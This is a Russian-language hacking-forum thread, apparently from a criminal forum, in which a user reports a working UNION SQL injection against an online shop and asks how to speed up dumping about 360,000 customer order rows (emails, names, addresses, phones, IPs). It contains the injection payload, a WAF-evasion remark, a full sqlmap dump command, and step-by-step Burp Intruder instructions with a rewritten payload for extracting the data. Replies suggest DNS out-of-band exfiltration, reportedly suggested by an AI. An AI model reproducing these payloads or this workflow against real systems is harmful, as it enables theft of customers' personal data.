UNION SQLi найден, но дамп 360к строк убивает время , нужны оптимизации

[FusBOTnet]

Всем привет! Нашел серьезную UNION-инъекцию в одном проекте, но столкнулся с проблемой
скорости дампа огромной таблицы. Нужны советы по оптимизации.

Цель: Таблица oc_order в БД MySQL/MariaDB
Объем: ~360,000 строк
Текущий доступ: Рабочий UNION-пайлоад + sql-shell через sqlmap

Иньекция:
path=1_2' UNION ALL SELECT 4362,4362,CONCAT(0x716a786b71,...)-- -

WAF: CloudFlare или подобный, но пропускает запросы с ротацией параметров

Текущая скорость:
10 строк (12 столбцов): 35 секунд
10,000 строк: 7 часов 48 минут


Текущая рабочая коммада:
T oc_order \
-C "email,firstname,ip,lastname,payment_address_1,payment_address_2,payment_address_format,payment_firstname,payment_lastname,telephone,total,user_agent" \
--dump \
--batch \
--technique=U \
--threads=8 \
--delay=1 \
--hex \
--dump-format=CSV

Так вот, есть ли у вас идеи как можно ускорить этот процесс, или как то разом дампнуть 360к строк, например через Sql shell

 

[blackhat1717]

Вы можете попробовать использовать Havidj или SQL Dumper.

 

[FusBOTnet]

Вы можете попробовать использовать Havidj или SQL Dumper.

Спасибо! А можно подробнее, буду благодарен

 

[etc/passwd]

Ставишь бурп.
Включаешь перехват.
В sqlmap прописываешь --proxy=https://127.0.0.1:8080
Ловишь запрос в burp и направляешь его в интрудер.
Меняешь запрос UNION ALL SELECT 4362,4362,CONCAT(0x716a786b71,...)-- - на UNION ALL SELECT 4362,4362,CONCAT_ws(0x3a,email,firstname,ip,lastname,payment_address_1,payment_address_2,payment_address_format,payment_firstname,payment_lastname,telephone,total,user_agent) from oc_order limit §1§,1 -- -
(пробелы меняй на %20 или на +) .
Во вкладке payloads type меняешь на numbers и ставишь нужный диапозон.
Во вкладке options ставишь потоки и задержку и так же выбираешь какую информацию тебе грепать. Все интуактивно понятно там.
Нажимаешь старт. Зачастую гораздо быстрее чем sqlmap.

 

[FusBOTnet]

Спасибо,

Ставишь бурп.
Включаешь перехват.
В sqlmap прописываешь --proxy=https://127.0.0.1:8080
Ловишь запрос в burp и направляешь его в интрудер.
Меняешь запрос UNION ALL SELECT 4362,4362,CONCAT(0x716a786b71,...)-- - на UNION ALL SELECT 4362,4362,CONCAT_ws(0x3a,email,firstname,ip,lastname,payment_address_1,payment_address_2,payment_address_format,payment_firstname,payment_lastname,telephone,total,user_agent) from oc_order limit §1§,1 -- -
(пробелы меняй на %20 или на +) .
Во вкладке payloads type меняешь на numbers и ставишь нужный диапозон.
Во вкладке options ставишь потоки и задержку и так же выбираешь какую информацию тебе грепать. Все интуактивно понятно там.
Нажимаешь старт. Зачастую гораздо быстрее чем sqlmap.

Спасибо, щас буду пробывать

 

[Теоретик]

У меня такое недавно было, мне кажется, дело в слепой инъекции, и иишка мне подсказывала, что можно всё перенаправить на свой DNS, это сразу ускорит процесс дампинга, я думаю, тебе может помочь, либо же смотря во что ты упираешься, в скорость получения данных через инъекцию или все же тебя стопит WAF

 

[money-]

What this guy above me said, you should look into it. DNS Channel Extraction is really useful. I did it once via Blind RCE SQLI Injection. I needed to use a DNS channel to extract the data.

 

[FusBOTnet]

У меня такое недавно было, мне кажется, дело в слепой инъекции, и иишка мне подсказывала, что можно всё перенаправить на свой DNS, это сразу ускорит процесс дампинга, я думаю, тебе может помочь, либо же смотря во что ты упираешься, в скорость получения данных через инъекцию или все же тебя стопит WAF

В общем, я просто написал скрипт на Bash который все эту темы быстренько сдампил. А на счет DNS я как понял ты имеешь ввиду Oob DNS, это отдельная тема, нужны определеныне критерии со стороны сайта